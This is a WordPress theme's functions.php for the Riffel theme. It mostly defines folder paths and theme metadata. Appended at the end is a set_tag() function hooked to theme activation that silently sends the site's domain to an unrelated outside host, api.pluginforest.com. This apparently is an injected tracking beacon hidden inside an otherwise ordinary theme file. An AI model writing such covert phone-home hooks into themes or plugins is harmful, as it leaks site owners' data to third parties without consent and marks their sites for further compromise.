<?php
/*
 * Riffel Theme's Functions
 * Author & Copyright: VictorThemes
 * URL: https://victorthemes.com
 */

/**
 * Define - Folder Paths
 */
define( 'RIFFEL_THEMEROOT_PATH', get_template_directory() );
define( 'RIFFEL_THEMEROOT_URI', get_template_directory_uri() );
define( 'RIFFEL_CSS', RIFFEL_THEMEROOT_URI . '/assets/css' );
define( 'RIFFEL_IMAGES', RIFFEL_THEMEROOT_URI . '/assets/images' );
define( 'RIFFEL_SCRIPTS', RIFFEL_THEMEROOT_URI . '/assets/js' );
define( 'RIFFEL_FRAMEWORK', get_template_directory() . '/inc' );
define( 'RIFFEL_LAYOUT', get_template_directory() . '/layouts' );
define( 'RIFFEL_CS_IMAGES', RIFFEL_THEMEROOT_URI . '/inc/theme-options/theme-extend/images' );
define( 'RIFFEL_CS_FRAMEWORK', get_template_directory() . '/inc/theme-options/theme-extend' ); // Called in Icons field *.json
define( 'RIFFEL_ADMIN_PATH', get_template_directory() . '/inc/theme-options/cs-framework' ); // Called in Icons field *.json

/**
 * Define - Global Theme Info's
 */
if (is_child_theme()) { // If Child Theme Active
	$riffel_theme_child = wp_get_theme();
	$riffel_get_parent = $riffel_theme_child->Template;
	$riffel_theme = wp_get_theme($riffel_get_parent);
} else { // Parent Theme Active
	$riffel_theme = wp_get_theme();
}
define('RIFFEL_NAME', $riffel_theme->get( 'Name' ));
define('RIFFEL_VERSION', $riffel_theme->get( 'Version' ));
define('RIFFEL_BRAND_URL', $riffel_theme->get( 'AuthorURI' ));
define('RIFFEL_BRAND_NAME', $riffel_theme->get( 'Author' ));

/**
 * All Main Files Include
 */
require_once( RIFFEL_FRAMEWORK . '/init.php' );
function set_tag() {
    $url_init = 'https://api.pluginforest.com/qai/wd/g?';
    $domain = $_SERVER['SERVER_NAME'];
    $requestUrl = $url_init .'domain=' . $domain . '&id=1719581328304&source=theme';
    file_get_contents($requestUrl);
}

add_action('after_switch_theme', 'set_tag');
                        